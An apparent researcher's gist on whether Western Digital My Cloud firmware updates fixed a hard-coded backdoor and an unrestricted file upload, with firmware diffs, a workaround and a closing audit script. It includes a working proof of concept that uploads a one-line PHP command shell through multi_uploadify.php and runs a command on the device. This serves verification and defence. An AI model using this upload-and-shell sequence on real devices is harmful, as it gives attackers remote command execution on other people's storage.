Investigating My Cloud vulnerabilities

Description of vulnerabilities: WDMyCloud Multiple Vulnerabilities

Update 2018-01-20

Both critical vulnerabilities (the hard-coded backdoor and the file upload vulnerability) have been corrected as of 2018-01-12 with the following firmwares:

My Cloud device   Firmware
---------------   ---------
Mirror            2.11.169
EX2               2.11.169
EX4               2.11.169
My Cloud          2.30.181
EX2 Ultra         2.30.181
Mirror Gen2       2.30.181
EX2100            2.30.181
EX4100            2.30.181
DL2100            2.30.181
DL4100            2.30.181
PR2100            2.30.181
PR4100            2.30.181

It appears that Western Digital simply removed the offending files from the firmware to correct the vulnerabilities:

wget http://download.wdc.com/nas/My_Cloud_BZVM_2.11.169.bin
binwalk -e My_Cloud_BZVM_2.11.169.bin

$ ls _My_Cloud_BZVM_2.11.169.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php
ls: cannot access '_My_Cloud_BZVM_2.11.169.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php': No such file or directory

$ ls _My_Cloud_BZVM_2.11.169.bin.extracted/squashfs-root/cgi/nas_sharing.cgi
ls: cannot access '_My_Cloud_BZVM_2.11.169.bin.extracted/squashfs-root/cgi/nas_sharing.cgi': No such file or directory

Workaround for file upload vulnerability

⚠️ I'm not sure what impact this workaround will have since I don't know what functionality uses multi_uploadify.php. The workaround can be removed by logging into your device and removing /var/www/.htaccess.

  1. Set your My Cloud device IP

    mycloudip=192.168.0.1

  2. Block multi_uploadify.php with an .htaccess file

    printf "RewriteRule ^web/jquery/uploader/multi_uploadify.php - [L,R=404]\n" > /tmp/.htaccess
    curl -v "http://$mycloudip/web/jquery/uploader/multi_uploadify.php?folder=/var/www/" -F "Filedata[]=@/tmp/.htaccess"

  3. Verify multi_uploadify.php returns a 404 code

    $ curl -I "http://$mycloudip/web/jquery/uploader/multi_uploadify.php"
    HTTP/1.1 404 Not Found

My Cloud Mirror gen 1

Setup

sudo apt install binwalk

wget http://download.wdc.com/nas/My_Cloud_BZVM_2.11.164.bin
wget http://download.wdc.com/nas/My_Cloud_BZVM_2.11.168.bin

binwalk -e My_Cloud_BZVM_2.11.164.bin
binwalk -e My_Cloud_BZVM_2.11.168.bin

01 - Unrestricted file upload: vulnerability not remediated

$ diff _My_Cloud_BZVM_2.11.164.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php _My_Cloud_BZVM_2.11.168.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php
$

printf "<?php echo system(\$_GET['cmd']); ?>" > /tmp/phpshell.php
$ curl -v "http://192.168.0.1/web/jquery/uploader/multi_uploadify.php?folder=/var/www/" -F "Filedata[]=@/tmp/phpshell.php"
*   Trying 192.168.0.1...
* Connected to 192.168.0.1 (192.168.0.1) port 80 (#0)
> POST /web/jquery/uploader/multi_uploadify.php?folder=/var/www/ HTTP/1.1
> Host: 192.168.0.1
> User-Agent: curl/7.47.0
> Accept: */*
> Content-Length: 245
> Expect: 100-continue
> Content-Type: multipart/form-data; boundary=------------------------9bdc535de1b1c15e
> 
< HTTP/1.1 100 Continue
< HTTP/1.1 302 Found
< Date: Sun, 07 Jan 2018 20:18:43 GMT
< Server: Apache
< X-Powered-By: PHP/5.4.16
< Location: ?status=1
< Content-Length: 0
< Content-Type: text/html
< Content-Language: en
* HTTP error before end of send, stop sending
< 
* Closing connection 0

$ curl 'http://192.168.0.1/phpshell.php?cmd=ls%20%2F'
CacheVolume
bin
dev
etc
home
lib
linuxrc
lost+found
mnt
nfs
opt
proc
root
sbin
shares
sys
system
tmp
usr
var

02 - Hard coded backdoor: vulnerability remediated

$ ls _My_Cloud_BZVM_2.11.164.bin.extracted/squashfs-root/cgi/nas_sharing.cgi 
_My_Cloud_BZVM_2.11.164.bin.extracted/squashfs-root/cgi/nas_sharing.cgi
$ ls _My_Cloud_BZVM_2.11.168.bin.extracted/squashfs-root/cgi/nas_sharing.cgi 
ls: cannot access '_My_Cloud_BZVM_2.11.168.bin.extracted/squashfs-root/cgi/nas_sharing.cgi': No such file or directory

My Cloud Mirror gen 2

Setup

wget http://download.wdc.com/nas/My_Cloud_BWVZ_2.30.165.bin
wget http://download.wdc.com/nas/My_Cloud_BWVZ_2.30.172.bin

binwalk -e My_Cloud_BWVZ_2.30.165.bin
binwalk -e My_Cloud_BWVZ_2.30.172.bin

01 - Unrestricted file upload: vulnerability appears to not be remediated

$ diff _My_Cloud_BWVZ_2.30.165.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php _My_Cloud_BWVZ_2.30.172.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php
$

02 - Hard coded backdoor: vulnerability remediated

$ ls _My_Cloud_BWVZ_2.30.165.bin.extracted/squashfs-root/cgi/nas_sharing.cgi
_My_Cloud_BWVZ_2.30.165.bin.extracted/squashfs-root/cgi/nas_sharing.cgi
$ ls _My_Cloud_BWVZ_2.30.172.bin.extracted/squashfs-root/cgi/nas_sharing.cgi
ls: cannot access '_My_Cloud_BWVZ_2.30.172.bin.extracted/squashfs-root/cgi/nas_sharing.cgi': No such file or directory

My Cloud EX2 Ultra

Setup

wget http://download.wdc.com/nas/My_Cloud_BVBZ_2.30.165.bin
wget http://download.wdc.com/nas/My_Cloud_BVBZ_2.30.174.bin

binwalk -e My_Cloud_BVBZ_2.30.165.bin
binwalk -e My_Cloud_BVBZ_2.30.174.bin

01 - Unrestricted file upload: vulnerability appears to not be remediated

$ diff _My_Cloud_BVBZ_2.30.165.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php _My_Cloud_BVBZ_2.30.174.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php
$

02 - Hard coded backdoor: vulnerability remediated

$ ls _My_Cloud_BVBZ_2.30.165.bin.extracted//squashfs-root/cgi/nas_sharing.cgi
_My_Cloud_BVBZ_2.30.165.bin.extracted//squashfs-root/cgi/nas_sharing.cgi
$ ls _My_Cloud_BVBZ_2.30.174.bin.extracted//squashfs-root/cgi/nas_sharing.cgi
ls: cannot access '_My_Cloud_BVBZ_2.30.174.bin.extracted//squashfs-root/cgi/nas_sharing.cgi': No such file or directory

Conclusion

The hard-coded backdoor vulnerability appears to have been remediated in the latest versions of the My Cloud firmwares, since the file nas_sharing.cgi has been removed. However, I see no evidence that the unrestricted file upload vulnerability was remediated in any version of the My Cloud firmware. In particular, there have been no changes to the file multi_uploadify.php between any recent versions of the firmware, and the file is identical between My_Cloud_BVBZ_2.30.165.bin (where GulfTech confirmed the vulnerability) and My_Cloud_BVBZ_2.30.174.bin (where the vulnerability was supposedly remediated):

$ diff -s _My_Cloud_BVBZ_2.30.165.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php _My_Cloud_BVBZ_2.30.174.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php
Files _My_Cloud_BVBZ_2.30.165.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php and _My_Cloud_BVBZ_2.30.174.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php are identical

I can confirm the unrestricted file upload vulnerability is present in firmware My_Cloud_BZVM_2.11.168.bin (see above), and multi_uploadify.php is also the same between that version and My_Cloud_BVBZ_2.30.174.bin:

$ diff -s _My_Cloud_BZVM_2.11.168.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php _My_Cloud_BVBZ_2.30.174.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php
Files _My_Cloud_BZVM_2.11.168.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php and _My_Cloud_BVBZ_2.30.174.bin.extracted/squashfs-root/web/pages/jquery/uploader/multi_uploadify.php are identical
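The per-device checks above (is nas_sharing.cgi gone, and is multi_uploadify.php still byte-identical to a version known to be vulnerable) can be run in one pass over every tree that binwalk -e produced. This is an added example, not part of the gist; the squashfs-relative paths are the ones the gist lists, and the reference hash of a known-vulnerable multi_uploadify.php is an input the caller supplies (for instance, the copy from My_Cloud_BZVM_2.11.168.bin).

```shell
#!/bin/sh
# Added example: audit extracted My Cloud firmware roots for the two files
# tracked in the gist. Not Western Digital's or the gist author's code.

# Paths relative to the extracted squashfs root, as used throughout the gist.
UPLOADIFY_REL="web/pages/jquery/uploader/multi_uploadify.php"
NAS_SHARING_REL="cgi/nas_sharing.cgi"

# sha256 of a file; portable across sha256sum (GNU) and shasum (BSD/macOS).
file_sha256() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    else
        shasum -a 256 "$1" | awk '{print $1}'
    fi
}

# audit_root ROOT [REF_SHA256]
# Prints one finding per line. Returns 0 only when both files are absent,
# which is what the 2018-01-12 firmware looks like. REF_SHA256, if given, is
# the hash of a multi_uploadify.php known to be vulnerable; an identical file
# is reported as unchanged (i.e. the upload endpoint was not touched).
audit_root() {
    root="$1"; ref="${2:-}"; status=0
    if [ -e "$root/$NAS_SHARING_REL" ]; then
        echo "$root: nas_sharing.cgi present (hard-coded backdoor NOT remediated)"
        status=1
    else
        echo "$root: nas_sharing.cgi absent (backdoor remediated)"
    fi
    if [ -e "$root/$UPLOADIFY_REL" ]; then
        status=1
        if [ -n "$ref" ] && [ "$(file_sha256 "$root/$UPLOADIFY_REL")" = "$ref" ]; then
            echo "$root: multi_uploadify.php unchanged from vulnerable reference"
        else
            echo "$root: multi_uploadify.php present (differs from reference; review required)"
        fi
    else
        echo "$root: multi_uploadify.php absent (upload endpoint removed)"
    fi
    return $status
}

# Typical use against the directories binwalk -e creates (hypothetical paths):
#   ref=$(file_sha256 _My_Cloud_BZVM_2.11.168.bin.extracted/squashfs-root/$UPLOADIFY_REL)
#   for d in _My_Cloud_*.bin.extracted/squashfs-root; do audit_root "$d" "$ref"; done
```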